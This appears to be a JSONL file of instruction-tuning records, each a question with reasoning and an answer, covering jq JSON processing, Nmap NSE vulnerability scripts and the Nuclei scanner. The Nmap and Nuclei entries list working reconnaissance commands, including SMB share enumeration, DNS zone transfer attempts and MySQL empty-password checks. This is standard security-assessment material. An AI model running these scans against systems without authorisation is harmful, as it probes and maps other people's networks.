{"type": "instruction_following", "instruction": "How to use JQ for JSON processing in security scripts?", "input": "", "reasoning": "jq is essential for parsing JSON output from security tools and APIs. Used for log processing and data extraction in scripts.", "output": "jq - JSON command-line processor. Commands: cat data.json | jq '.' (pretty-print). jq '.results' file.json (extract key). jq '.[] | select(.severity == \"high\")' vulns.json (filter). jq '.[].ip' hosts.json (extract all IPs). jq -r '.[].name' names.json (raw output, no quotes). jq 'group_by(.port) | map({port: .[0].port, count: length})' scans.json (aggregate). jq -c '.[]' file.json (compact output). jq -s 'add' *.json (merge multiple JSON files). jq '[.[] | {ip: .ip, port: .port}]' file.json (reshape objects). jq 'unique_by(.ip)' file.json (deduplicate). jq --arg ip '10.0.0.1' '.[] | select(.ip == $ip)' file.json (variable binding). jq -f filter.jq data.json (use filter file)."}
{"type": "instruction_following", "instruction": "How to use Nmap NSE scripts for vulnerability scanning?", "input": "", "reasoning": "NSE (Nmap Scripting Engine) extends nmap with automated vulnerability detection. Essential for comprehensive service assessment.", "output": "NSE - Nmap Scripting Engine. Command: nmap -sV --script=<script> <target>. nmap --script=vuln <target> (all vulnerability checks). nmap --script=http-enum <target> (web directory enum). nmap --script=smb-enum-shares <target> (SMB shares). nmap --script=rdp-sec-check <target> (RDP security). nmap --script=ssl-enum-ciphers -p 443 <target> (TLS cipher audit). nmap --script=dns-zone-transfer <target> (DNS zone transfer). nmap --script=ssh2-enum-algos <target> (SSH algorithms). nmap --script=mysql-empty-password <target> (MySQL default creds). Custom NSE: /usr/share/nmap/scripts/ (script location). Write NSE: in Lua with description, author, categories, portrule, action function. Update NSE DB: nmap --script-updatedb."}
{"type": "instruction_following", "instruction": "How to use Nuclei for automated vulnerability scanning?", "input": "", "reasoning": "Nuclei is a fast template-based vulnerability scanner. Used for large-scale automated security assessments.", "output": "Nuclei - template-based vulnerability scanner. Commands: nuclei -u http://target.com (scan single target). nuclei -l targets.txt (scan list). nuclei -t cves/ -u http://target.com (scan CVE templates only). nuclei -t ~/nuclei-templates/ -u http://target.com -severity critical,high (by severity). nuclei -u http://target.com -o results.json -json (JSON output). nuclei -u http://target.com -stats (real-time stats). nuclei -u http://target.com -rate-limit 100 (requests/second). Custom templates: id: custom-check, info: { name: '...', severity: medium }, requests: [{ method: GET, path: ['/admin'], matchers: [{ type: word, words: ['Dashboard', 'Login'] }] }]. Templates dir: ~/nuclei-templates/. Update: nuclei -update-templates."}